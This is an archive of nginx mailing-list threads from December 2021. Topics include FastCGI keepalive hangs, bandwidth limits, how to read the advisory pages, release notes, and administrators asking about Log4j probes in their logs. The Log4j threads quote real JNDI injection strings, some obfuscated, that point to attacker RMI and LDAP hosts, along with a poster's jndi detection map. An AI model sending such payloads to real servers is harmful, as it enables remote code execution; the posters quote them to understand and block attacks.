attachment was scrubbed... URL: From lists at lazygranch.com Mon Dec 20 19:08:25 2021 From: lists at lazygranch.com (lists at lazygranch.com) Date: Mon, 20 Dec 2021 11:08:25 -0800 Subject: 200 html return to log4j exploit In-Reply-To: References: <20211219200208.691f776b.lists@lazygranch.com> Message-ID: <20211220110825.2175a142.lists@lazygranch.com> On Mon, 20 Dec 2021 17:49:48 +0000 Jay Caines-Gooby wrote: > The request is for your index page "GET / HTTP/1.1"; that's why your > server responded with 200 OK. The special characters are in the > referer and user-agent fields, as a log4j system would also try to > interpolate these, and thus be vulnerable to the exploit. > > On Mon, 20 Dec 2021 at 04:02, lists at lazygranch.com > wrote: > > > I don't have any service using java so I don't believe I am subject > > to this exploit. 
Howerver I am confused why a returned a 200 for > > this request. The special characters in the URL are confusing. > > > > 200 207.244.245.138 - - [17/Dec/2021:02:58:02 +0000] "GET / > > HTTP/1.1" 706 > > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" > > "${${lower:jndi}:${lower:rmi}://185.254.196.236:1389/jijec}" "-" > > > > log_format main '$status $remote_addr - $remote_user > > [$time_local] "$request" ' '$body_bytes_sent "$http_referer" ' > > '"$http_user_agent" "$http_x_forwarded_for"'; > > > > That is my log format from the nginx.conf. > > > > I now have a map to catch "jndi" in both url and agent. So far so > > good not that it matters much. I just like to gather IP addresses > > from hackers and block their host if it lacks eyeballs, > > _______________________________________________ Thanks for both replies. Note the hackers have done a work around to get past my simple "map" detection. Matching jndi is not sufficient. Examples: 103.107.245.1 - - [20/Dec/2021:14:38:15 +0000] "GET / HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary }" "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "-" 103.107.245.1 - - [20/Dec/2021:14:38:16 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F188.166.57.35%3A 1389%2FBinary%7D HTTP/1.1" 706 "${${::-j}ndi:rmi://188.166.57.35:1389/Binary}" "${${::-j}ndi:rmi://188.166.57.35:1389 /Binary}" "-" I can't really tell if this Indonesian IP address is an ISP or not so I guess I will let them slide from the firewall. The other IP is for Digital Ocean. I have some droplets there and yeah there are bad actors on the service. Kind of sad I have to block the vendor I use but probably AWS, Linode, etc is just as bad. For the price of the service you simply can't police it at scale. Probably another stupid question but what is up with this ${ stuff? I need some terminology to google and read up on this. From mdounin at mdounin.ru Mon Dec 20 19:35:36 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 20 Dec 2021 22:35:36 +0300 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Message-ID: Hello! On Mon, Dec 20, 2021 at 04:00:59PM +0000, Nicolas Franck wrote: > Interesting! > > I looks like there is nothing that managing the incoming connections > for the fcgi workers. Every fcgi worker needs to do this on its own, right? > So if there are more clients (i.e. nginx workers) than fcgi workers, > then it becomes unresponsive after a few requests, because all > the fcgi workers are holding on to a connection to an nginx worker, > and there seems to be no queue handling this. > > Is this correct? Just guessing here More or less. The FastCGI code in your example implies very simple connection management, based on the process-per-connection model. As long as all FastCGI processes are busy, all additional connections will be queued in the listen queue of FastCGI listening socket (till a connection is closed). Certainly that's not the only model possible with FastCGI, but the easiest to use. The process-per-connection model doesn't combine well with keepalive connections, since each keepalive connection occupies the whole process. And you have to create enough processes to handle all keepalive connections you want to be able to keep alive. In case of nginx as a client, this means at least ( * ) processes. Alternatively, you can avoid using keepalive connections. 
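As a rough sketch of that sizing rule (the numbers are only an example,
matching the "keepalive 10;" upstream quoted above and 2 nginx worker
processes):

    # nginx may cache up to (keepalive * worker_processes) connections,
    # so the backend needs at least that many FastCGI children:
    # 10 * 2 = 20
    spawn-fcgi -F 20 -f /path/to/fcgi_example -p 9000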
These are not really needed for local upstream servers, since connection establishment costs are usually negligible compared to the total request processing costs. And this is what nginx does by default. -- Maxim Dounin http://mdounin.ru/ From Nicolas.Franck at UGent.be Mon Dec 20 20:53:48 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Mon, 20 Dec 2021 20:53:48 +0000 Subject: keepalive connection to fastcgi backend hangs In-Reply-To: References: <35BF7F7A-6589-4CBA-A6B1-1A14D42401BB@ugent.be> <04EB529A-A043-4F8F-B6F6-C8C6B7020C5B@ugent.be> Message-ID: <27987D2A-4C8F-4D5A-9BDA-0F1110D968B1@ugent.be> I kind of agree: keepalive connections are not strictly necessary in this scenario. But there is a reason why I started looking into this: I started noticing a lot of closed tcp connections with status TIME_WAIT. That happens when you close the connection on your end, and the os keeps these around for a few seconds, to make sure that the other end of the connection got the tcp "FIN". During that time the client port for that connection cannot be used: $ netstat -an | grep :5000 (if the fcgi app is listening on port 5000) If you receive a lot of requests after each other, and the number grows larger than the os can free the TIME_WAIT connections, then you'll run out of client ports, and see seemingly unrelated errors like "dns lookup failure". This even happens when the response of the upstream server is fast, as it takes a "lot" of time before the TIME_WAIT connections are freed. Reuse of tcp connections is one way to tackle this problem. Playing around with sysctl is another: $ sysctl -w net.ipv4.tcp_tw_recycle=1 But I am not well versed in this, and I do not know a lot about the possible side effects. cf. https://web3us.com/drupal6/how-guides/what-timewait-state cf. https://onlinehelp.opswat.com/centralmgmt/What_you_need_to_do_if_you_see_too_many_TIME_WAIT_sockets.html On 20 Dec 2021, at 20:35, Maxim Dounin > wrote: Hello! On Mon, Dec 20, 2021 at 04:00:59PM +0000, Nicolas Franck wrote: Interesting! I looks like there is nothing that managing the incoming connections for the fcgi workers. Every fcgi worker needs to do this on its own, right? So if there are more clients (i.e. nginx workers) than fcgi workers, then it becomes unresponsive after a few requests, because all the fcgi workers are holding on to a connection to an nginx worker, and there seems to be no queue handling this. Is this correct? Just guessing here More or less. The FastCGI code in your example implies very simple connection management, based on the process-per-connection model. As long as all FastCGI processes are busy, all additional connections will be queued in the listen queue of FastCGI listening socket (till a connection is closed). Certainly that's not the only model possible with FastCGI, but the easiest to use. The process-per-connection model doesn't combine well with keepalive connections, since each keepalive connection occupies the whole process. And you have to create enough processes to handle all keepalive connections you want to be able to keep alive. In case of nginx as a client, this means at least ( * ) processes. Alternatively, you can avoid using keepalive connections. These are not really needed for local upstream servers, since connection establishment costs are usually negligible compared to the total request processing costs. And this is what nginx does by default. 
-- Maxim Dounin https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmdounin.ru%2F&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cb8a3cee984e84e47f86408d9c3efed9f%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756257522060451%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=%2FSv4njqodduc7rpTd5m0FXnO1DBmQooZmFXABzKbC2A%3D&reserved=0 _______________________________________________ nginx mailing list nginx at nginx.org https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cb8a3cee984e84e47f86408d9c3efed9f%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637756257522060451%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=3gI9%2F8oxIPl65YD1pbdE5zT%2FsUM7JQUW5qLkQpSCAGU%3D&reserved=0 -------------- next part -------------- An HTML attachment was scrubbed... URL: From francis at daoine.org Wed Dec 22 23:47:44 2021 From: francis at daoine.org (Francis Daly) Date: Wed, 22 Dec 2021 23:47:44 +0000 Subject: bandwidth limit for specific server In-Reply-To: References: Message-ID: <20211222234744.GC12557@daoine.org> On Sat, Dec 18, 2021 at 01:37:11PM +0800, huiming wrote: Hi there, > Is it possible to limit total bandwidth for server? Using only stock nginx, I believe the answer is "yes, but not in a way that you would want; so effectively no". You can limit the number of concurrent (active) connections; you can limit the rate of requests that nginx will process; and you can limit the response bandwidth for each request. By combining those, you can put an upper limit on the response bandwidth; but I suspect that it is unlikely to be useful for you. You might be happier looking for a third-party module that does some form of internal bandwidth limiting; or use something outside of nginx to limit the bandwidth. The latter would probably be simpler if your chosen server_name was the only one this nginx handled; or if the IP address were dedicated to this server_name -- in those cases, the external thing would not need to know much (or anything?) about what nginx is doing; it could just handle "traffic from this process group", or "traffic from this IP address". > server { > listen 443 ssl; > server_name x.x.x.x.x; > > > is it possible to limit total bandwidth for this server to for example 5M ? not to limit TCP connection bandwidth. need total bandwidth. It is using the TCP connection bandwidth limit; but if you were to "limit_rate" to 1m and "limit_req" to 5 r/s, then you would not use more than 5M (bps) -- but you would probably normally end up using less than that; because individual requests would not use 5, while multiple requests would probably lead to lots of small failure responses. Good luck with it, f -- Francis Daly francis at daoine.org From 877509395 at qq.com Thu Dec 23 01:53:26 2021 From: 877509395 at qq.com (=?gb18030?B?aHVpbWluZw==?=) Date: Thu, 23 Dec 2021 09:53:26 +0800 Subject: bandwidth limit for specific server In-Reply-To: <20211222234744.GC12557@daoine.org> References: <20211222234744.GC12557@daoine.org> Message-ID: Francis Daly?       extremely appreciative of your feedback.      Any suggestion for third-party module that does some form of internal bandwidth limiting?  
thanks huiming ------------------ Original ------------------ From: "nginx" From francis at daoine.org Fri Dec 24 13:23:31 2021 From: francis at daoine.org (Francis Daly) Date: Fri, 24 Dec 2021 13:23:31 +0000 Subject: bandwidth limit for specific server In-Reply-To: References: <20211222234744.GC12557@daoine.org> Message-ID: <20211224132331.GE12557@daoine.org> On Thu, Dec 23, 2021 at 09:53:26AM +0800, huiming wrote: Hi there, > Any suggestion for third-party module that does some form of internal bandwidth limiting? Noting that I imagine that if this facility were straightforward to implement efficiently and reliably in a future-proof fashion, it would already be included in a stock nginx module; I can see that a web search for some likely-looking terms points at https://github.com/vozlt/nginx-module-vts as maybe being interesting. (But I'm not sure if that limits the total transfer, or the transfer rate. You'll want to test if it does the thing that you want, and if the limitations are acceptable to you.) Good luck with it, f -- Francis Daly francis at daoine.org From Nicolas.Franck at UGent.be Fri Dec 24 14:26:26 2021 From: Nicolas.Franck at UGent.be (Nicolas Franck) Date: Fri, 24 Dec 2021 14:26:26 +0000 Subject: bandwidth limit for specific server In-Reply-To: <20211224132331.GE12557@daoine.org> References: <20211222234744.GC12557@daoine.org> <20211224132331.GE12557@daoine.org> Message-ID: <52816AFA-51B4-4042-A0BA-BDE5E2AD4B42@ugent.be> Something to take into account: if you limit the bandwidth, a nginx worker will have to spend more time for that request, time he cannot spend on other, possibly more meaningful requests. > On 24 Dec 2021, at 14:23, Francis Daly wrote: > > On Thu, Dec 23, 2021 at 09:53:26AM +0800, huiming wrote: > > Hi there, > >> Any suggestion for third-party module that does some form of internal bandwidth limiting? > > Noting that I imagine that if this facility were straightforward > to implement efficiently and reliably in a future-proof fashion, > it would already be included in a stock nginx module; I can > see that a web search for some likely-looking terms points at > https://eur03.safelinks.protection.outlook.com/?url=https%3A%2F%2Fgithub.com%2Fvozlt%2Fnginx-module-vts&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cf8ccb3df1ea8452a46bf08d9c6e0a02d%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637759490768086551%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=S61bxGKoqFHttBvuP3nl5YAaGBJkJyVMmvBr96R699I%3D&reserved=0 as maybe being interesting. > > (But I'm not sure if that limits the total transfer, or the transfer > rate. You'll want to test if it does the thing that you want, and if > the limitations are acceptable to you.) 
> > Good luck with it, > > f > -- > Francis Daly francis at daoine.org > _______________________________________________ > nginx mailing list > nginx at nginx.org > https://eur03.safelinks.protection.outlook.com/?url=http%3A%2F%2Fmailman.nginx.org%2Fmailman%2Flistinfo%2Fnginx&data=04%7C01%7CNicolas.Franck%40ugent.be%7Cf8ccb3df1ea8452a46bf08d9c6e0a02d%7Cd7811cdeecef496c8f91a1786241b99c%7C1%7C0%7C637759490768086551%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C3000&sdata=VTsIXXzZRvtaPGQ%2Fp42Dv8DCM%2FBB8dABBBPcbpx03VI%3D&reserved=0 From paul at stormy.ca Fri Dec 24 16:42:41 2021 From: paul at stormy.ca (Paul) Date: Fri, 24 Dec 2021 11:42:41 -0500 Subject: bandwidth limit for specific server In-Reply-To: References: <20211222234744.GC12557@daoine.org> Message-ID: On 2021-12-22 8:53 p.m., huiming wrote: > Francis Daly? > > ?extremely appreciative of your feedback. > > ? ? ?Any suggestion for third-party module that does some form of > internal bandwidth limiting? Disclaimer: this is not a specific nginx reply. And it's not third-party. You can profile all uses of bandwidth within a linux environment using tc (please see ) Season's greetings to all on list, Paul --- Tired old sys-admin. > > thanks > huiming > > > ------------------?Original?------------------ > *From:* "nginx" ; > *Date:*?Thu, Dec 23, 2021 07:47 AM > *To:*?"nginx"; > *Subject:*?Re: bandwidth limit for specific server > > On Sat, Dec 18, 2021 at 01:37:11PM +0800, huiming wrote: > > Hi there, > > >?? Is it possible to limit total bandwidth for server? > > Using only stock nginx, I believe the answer is "yes, but not in a way > that you would want; so effectively no". > > You can limit the number of concurrent (active) connections; you can > limit the rate of requests that nginx will process; and you can limit > the response bandwidth for each request. > > By combining those, you can put an upper limit on the response bandwidth; > but I suspect that it is unlikely to be useful for you. > > > > You might be happier looking for a third-party module that does some > form of internal bandwidth limiting; or use something outside of nginx > to limit the bandwidth. > > The latter would probably be simpler if your chosen server_name was > the only one this nginx handled; or if the IP address were dedicated to > this server_name -- in those cases, the external thing would not need to > know much (or anything?) about what nginx is doing; it could just handle > "traffic from this process group", or "traffic from this IP address". > > >?? server { > >???? listen?? 443 ssl; > >???? server_name x.x.x.x.x; > > > > > >???? is it possible to limit total bandwidth for this server to for > example 5M ? not to limit TCP connection bandwidth. need total bandwidth. > > It is using the TCP connection bandwidth limit; but if you were to > "limit_rate" to 1m and "limit_req" to 5 r/s, then you would not use > more than 5M (bps) -- but you would probably normally end up using less > than that; because individual requests would not use 5, while multiple > requests would probably lead to lots of small failure responses. > > Good luck with it, > > f > -- > Francis Daly??????? 
francis at daoine.org > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > \\\||// (@ @) ooO_(_)_Ooo__________________________________ |______|_____|_____|_____|_____|_____|_____|_____| |___|____|_____|_____|_____|_____|_____|_____|____| |_____|_____| mailto:paul at stormy.ca _|____|____| From nginx-forum at forum.nginx.org Sat Dec 25 15:14:32 2021 From: nginx-forum at forum.nginx.org (rjvbzeoibvpzie) Date: Sat, 25 Dec 2021 10:14:32 -0500 Subject: Alert: ignore long locked inactive cache entry In-Reply-To: References: Message-ID: <3c00b8441d6495fed6aa6d7eefa99e82.NginxMailingListEnglish@forum.nginx.org> # cat /var/log/nginx/error.log 2021/12/25 03:27:20 [alert] 3509876#3509876: ignore long locked inactive cache entry 896ea4afe7d75fae51aada8fb6643347, count:1 2021/12/25 07:57:02 [alert] 3509876#3509876: ignore long locked inactive cache entry c4008f632b145d701271b37180818fb8, count:2 2021/12/25 11:14:15 [alert] 3509876#3509876: ignore long locked inactive cache entry c5e2871d4c2314567a1960f9ad10d073, count:3 2021/12/25 12:55:22 [alert] 3509876#3509876: ignore long locked inactive cache entry f0996097b19a16ba901048bd02f27392, count:12 2021/12/25 13:35:55 [alert] 3509876#3509876: ignore long locked inactive cache entry ac59cdf58270b936105d0588eb036a04, count:12 2021/12/25 13:43:53 [alert] 3509876#3509876: ignore long locked inactive cache entry 06a24ed9b7cace543d7189bc19e27f93, count:1 # nginx -V nginx version: nginx/1.21.4 built with OpenSSL 1.1.1f 31 Mar 2020 TLS SNI support enabled configure arguments: --with-cc-opt='-g -O2 -fdebug-prefix-map=/build/nginx-9JOsze/nginx-1.21.4=. -fstack-protector-strong -Wformat -Werror=format-security -fPIC -Wdate-time -D_FORTIFY_SOURCE=2' --with-ld-opt='-Wl,-Bsymbolic-functions -Wl,-z,relro -Wl,-z,now -fPIC' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-compat --with-debug --with-pcre-jit --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module Posted at Nginx Forum: https://forum.nginx.org/read.php?2,291199,293142#msg-293142 From hritikxx8 at gmail.com Tue Dec 28 08:44:07 2021 From: hritikxx8 at gmail.com (Hritik Vijay) Date: Tue, 28 Dec 2021 14:14:07 +0530 Subject: Nginx advisories with not vulnerable versions inside the vulnerable range Message-ID: Hello I'm trying to parse the advisories page present at https://nginx.org/en/security_advisories.html. So far, I've understood the even-odd minor versioning scheme for branches (thanks to Maxim at https://marc.info/?l=nginx&m=163174223924231&w=2). There still exists some advisories that are hard to understand. 
For example: Excessive CPU usage in HTTP/2 with small window updates Severity: medium Advisory CVE-2019-9511 Not vulnerable: 1.17.3+, 1.16.1+ Vulnerable: 1.9.5-1.17.2 Here, the vulnerable versions are through 1.9.5 to 1.17.2, even though the versions 1.16.1+ are marked not vulnerable. Looking at the odd numbers in the vulnerable range, I could infer that perhaps the vulnerability spanned through the mainline branch only. Even then it raises some questions. Following are some interpretations and the problems with them: Interpretation: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch. Problem: 1.16.1+ is marked as not vulnerable so the vulnerability must have been fixed in the 1.16 stable branch as well. Interpretation: Only mainline versions between 1.9.5-1.17.2 are vulnerable (as the upper and lower bounds have odd minor) Problem: This implies the stable versions 1.10.1+, 1.12.1+ ... 1.16.1+ are not vulnerable, this is less likely as these ranges did not make it into the not vulnerable range. Interpretation: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch, except the ones mentioned in the not vulnerable range Problem: If the not vulnerable range is to be interpreted as an "exception" to the vulnerable range then there's no point in mentioning 1.17.3+ as it already lies outside the vulnerable range. The last interpretation sounds most reasonable to me with the following changes: All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the branch. It was fixed in the only provided mainline branch that is 1.17.3+, although some fixes were provided to the stable branches as well (here only one stable branch, that is 1.16.1+). This will require a hard requirement for the following: Not Vulnerable: One mainline version with plus sign, One or many stable branch version with plus sign Vulnerable: A range independent of branching scheme (mainline and stable) Although, this sounds right and suits for most of the advisories present on the page, it doesn't handle: Buffer underflow vulnerability Severity: major VU#180065 CVE-2009-2629 Not vulnerable: 0.8.15+, 0.7.62+, 0.6.39+, 0.5.38+ Vulnerable: 0.1.0-0.8.14 As there are more than one mainline branch - 0.7.62+ and 0.5.38+ - in the "Not Vulnerable" range, where there should only be one. Once a vulnerability is fixed in a lower mainline version (0.5.38) it must have been fixed in later mainline and stable versions, which doesn't seem to be the case here (as 0.7.62+ and 0.6.39+ are mentioned explicitly). Is there any other interpretation that I'm missing that is more suitable here ? Also, are there any plans to document the same ? From mdounin at mdounin.ru Tue Dec 28 14:27:41 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 28 Dec 2021 17:27:41 +0300 Subject: Nginx advisories with not vulnerable versions inside the vulnerable range In-Reply-To: References: Message-ID: Hello! On Tue, Dec 28, 2021 at 02:14:07PM +0530, Hritik Vijay wrote: > I'm trying to parse the advisories page present at > https://nginx.org/en/security_advisories.html. So far, I've understood > the even-odd minor versioning scheme for branches (thanks to Maxim at https://marc.info/?l=nginx&m=163174223924231&w=2). > There still exists some advisories that are hard to understand. 
> For example: > Excessive CPU usage in HTTP/2 with small window updates > Severity: medium > Advisory > CVE-2019-9511 > Not vulnerable: 1.17.3+, 1.16.1+ > Vulnerable: 1.9.5-1.17.2 > > Here, the vulnerable versions are through 1.9.5 to 1.17.2, even though > the versions 1.16.1+ are marked not vulnerable. > Looking at the odd numbers in the vulnerable range, I could infer that > perhaps the vulnerability spanned through the mainline branch only. Even > then it raises some questions. Following are some interpretations and > the problems with them: [...] > Interpretation: > All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the > branch, except the ones mentioned in the not vulnerable range > Problem: > If the not vulnerable range is to be interpreted as an "exception" > to the vulnerable range then there's no point in mentioning 1.17.3+ > as it already lies outside the vulnerable range. That's the correct interpretation. While explicitly mentioning 1.17.3+ as not vulnerable is not strictly needed, it is just duplicate information to simplify reading. > The last interpretation sounds most reasonable to me with the following > changes: > All versions from 1.9.5 to 1.17.2 are vulnerable, regardless of the > branch. It was fixed in the only provided mainline branch that is > 1.17.3+, although some fixes were provided to the stable branches as > well (here only one stable branch, that is 1.16.1+). > > This will require a hard requirement for the following: > Not Vulnerable: > One mainline version with plus sign, > One or many stable branch version with plus sign > Vulnerable: > A range independent of branching scheme (mainline and stable) > > Although, this sounds right and suits for most of the advisories present > on the page, it doesn't handle: > Buffer underflow vulnerability > Severity: major > VU#180065 CVE-2009-2629 > Not vulnerable: 0.8.15+, 0.7.62+, 0.6.39+, 0.5.38+ > Vulnerable: 0.1.0-0.8.14 > > As there are more than one mainline branch - 0.7.62+ and 0.5.38+ - in > the "Not Vulnerable" range, where there should only be one. Once a > vulnerability is fixed in a lower mainline version (0.5.38) it must have > been fixed in later mainline and stable versions, which doesn't seem to > be the case here (as 0.7.62+ and 0.6.39+ are mentioned explicitly). Your interpretation of "mainline" and "stable" is incorrect here. The odd/even numbering scheme is in use only starting with nginx 1.0.x. In previous versions, a branch was simply declared stable at some point. For example, 0.5.x branch was mainline (current) till 0.5.25, and then 0.6.0 version was released, and 0.5.x branch was declared stable[1]. Similarly, 0.6.x branch was mainline till 0.6.31, and was declared stable after 0.7.0 release. For additional details about all existing branches check the download page (http://nginx.org/en/download.html) and relevant CHANGES and CHANGES-X.Y files. Note that it is generally trivial to find out if a version is vulnerable or not from the information about a vulnerability, without any knowledge about nginx branches. That is: - Check if the version is in "Vulnerable" range. If it's not, the version is not vulnerable. - If it is, check if the branch is explicitly listed in the "Not vulnerable". If it's not, the version is vulnerable. If it is, check the minor number: if it's greater or equal to the version listed as not vulnerable, the version is not vulnerable, else the version is vulnerable. Hope this helps. 
[1] http://mailman.nginx.org/pipermail/nginx/2007-June/001080.html -- Maxim Dounin http://mdounin.ru/ From mdounin at mdounin.ru Tue Dec 28 15:41:50 2021 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 28 Dec 2021 18:41:50 +0300 Subject: nginx-1.21.5 Message-ID: Changes with nginx 1.21.5 28 Dec 2021 *) Change: now nginx is built with the PCRE2 library by default. *) Change: now nginx always uses sendfile(SF_NODISKIO) on FreeBSD. *) Feature: support for sendfile(SF_NOCACHE) on FreeBSD. *) Feature: the $ssl_curve variable. *) Bugfix: connections might hang when using HTTP/2 without SSL with the "sendfile" and "aio" directives. -- Maxim Dounin http://nginx.org/ From xeioex at nginx.com Tue Dec 28 16:07:12 2021 From: xeioex at nginx.com (Dmitry Volyntsev) Date: Tue, 28 Dec 2021 19:07:12 +0300 Subject: njs-0.7.1 Message-ID: Hello, I'm glad to announce a new release of NGINX JavaScript module (njs). This release focuses on stabilization of recently released features including async/await and HTTPS support in ngx.fetch(). The "js_include" directive deprecated since 0.4.0 was removed. Also a series of user invisible refactoring was committed. The most prominent one is PCRE2 support. PCRE2 is the default RegExp engine now. Learn more about njs: - Overview and introduction: https://nginx.org/en/docs/njs/ - NGINX JavaScript in Your Web Server Configuration: https://youtu.be/Jc_L6UffFOs - Extending NGINX with Custom Code: https://youtu.be/0CVhq4AUU7M - Using node modules with njs: https://nginx.org/en/docs/njs/node_modules.html - Writing njs code using TypeScript definition files: https://nginx.org/en/docs/njs/typescript.html We are hiring: If you are a C programmer, passionate about Open Source and you love what we do, consider the following career opportunity: https://ffive.wd5.myworkdayjobs.com/NGINX/job/Ireland-Homebase/Software-Engineer-III---NGNIX-NJS_RP1022237 Feel free to try it and give us feedback on: - Github: https://github.com/nginx/njs/issues - Mailing list: https://mailman.nginx.org/mailman/listinfo/nginx-devel Changes with njs 0.7.1 28 Dec 2021 nginx modules: *) Change: the "js_include" directive deprecated since 0.4.0 was removed. *) Change: PCRE/PCRE2-specific code was moved to the modules. This ensures that njs uses the same RegExp library as nginx. Core: *) Feature: extended "fs" module. Added stat(), fstat() and friends. *) Change: default RegExp engine for CLI is switched to PCRE2. *) Bugfix: fixed decodeURI() and decodeURIComponent() with invalid byte strings. The bug was introduced in 0.4.3. *) Bugfix: fixed heap-use-after-free in await frame. The bug was introduced in 0.7.0. *) Bugfix: fixed WebCrypto sign() and verify() methods with OpenSSL 3.0. *) Bugfix: fixed exception throwing when RegExp match fails. The bug was introduced in 0.1.15. *) Bugfix: fixed catching of exception thrown in try block of async function. The bug was introduced in 0.7.0. *) Bugfix: fixed execution of async function in synchronous context. The bug was introduced in 0.7.0. *) Bugfix: fixed function redeclaration in CLI when interactive mode is on. The bug was introduced in 0.6.2. *) Bugfix: fixed typeof operator with DataView object. *) Bugfix: eliminated information leak in Buffer.from(). 
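A side note on the nginx 1.21.5 change list above: the new $ssl_curve
variable can be used like any other connection variable, for example in
a log format. A small illustrative sketch, with an arbitrary format name
and log path:

    log_format tls_info '$remote_addr "$ssl_protocol $ssl_cipher $ssl_curve" '
                        '"$request" $status';
    access_log /var/log/nginx/tls.log tls_info;

For TLS connections this records the negotiated curve, typically
something like prime256v1.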
From mauro.tridici at cmcc.it  Wed Dec 29 14:55:35 2021
From: mauro.tridici at cmcc.it (Mauro Tridici)
Date: Wed, 29 Dec 2021 15:55:35 +0100
Subject: Help request about Log4j attack attempts and NGINX logs meaning
Message-ID: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it>

Dear Users,

I have an old instance of NGINX (v.1.10.1) running as a proxy server on a dedicated hardware platform.
Since the proxy service is reachable from the internet, it is constantly exposed to cyber attacks.
In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.

At this moment, a host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempt.
Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was "HTTP/1.1 200" and I'm very worried about it.
Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.
Could you please help me to understand the reason why the NGINX server answer was "HTTP/1.1 200"?

You can see below the mail notification I received:

Attack Notification.
2021 Dec 28 20:45:59

Received From: "hidden_NGINX_server_IP" >/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 166.137.252.110
Portion of the log(s):

166.137.252.110 - - [28/Dec/2021:21:45:58 +0100] "GET /?sulgz=${jndi:ldap://"hidden_NGINX_server_IP".c75pz6m2vtc0000bnka0gd15xueyyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"

Thank you in advance,
Mauro
-------------- next part --------------
An HTML attachment was scrubbed...
URL:

From lists at lazygranch.com  Wed Dec 29 17:03:21 2021
From: lists at lazygranch.com (lists)
Date: Wed, 29 Dec 2021 09:03:21 -0800
Subject: Help request about Log4j attack attempts and NGINX logs meaning
In-Reply-To: <7639E066-0367-4B2B-A15B-A7AB69E85FE0@cmcc.it>
Message-ID:

That IP space is certified shady. I detect the occasional hack from them. See

https://krebsonsecurity.com/2019/08/the-rise-of-bulletproof-residential-networks/

and

https://wirelessdataspco.org/faq.php

These wireless companies will do anything for money, including leasing their IP space.

I don't block the IP space since it could be from normal users. Plus plenty of hacking comes from actual wireless providers' customers. But I am appalled that highly profitable wireless providers lease ipv4 space to hackers for what is pocket change for them.

I will leave it up to the gurus to parse the log.

Original Message

From: mauro.tridici at cmcc.it
Sent: December 29, 2021 6:55 AM
To: nginx at nginx.org
Reply-to: nginx at nginx.org
Subject: Help request about Log4j attack attempts and NGINX logs meaning

Dear Users,

I have an old instance of NGINX (v.1.10.1) running as a proxy server on a dedicated hardware platform.
Since the proxy service is reachable from the internet, it is constantly exposed to cyber attacks.
In my particular case, it is attacked by a lot of Log4j attack attempts from several malicious IPs.

At this moment, a host intrusion detection system (HIDS) is running and is protecting the NGINX server: it seems it is blocking every malicious attack attempt.
Anyway, during the last attack mail notification sent by the HIDS, I noticed that the NGINX server response was "HTTP/1.1 200" and I'm very worried about it.
Log4j and Java packages are NOT installed on the NGINX server and all the servers behind the proxy are not using Log4j.
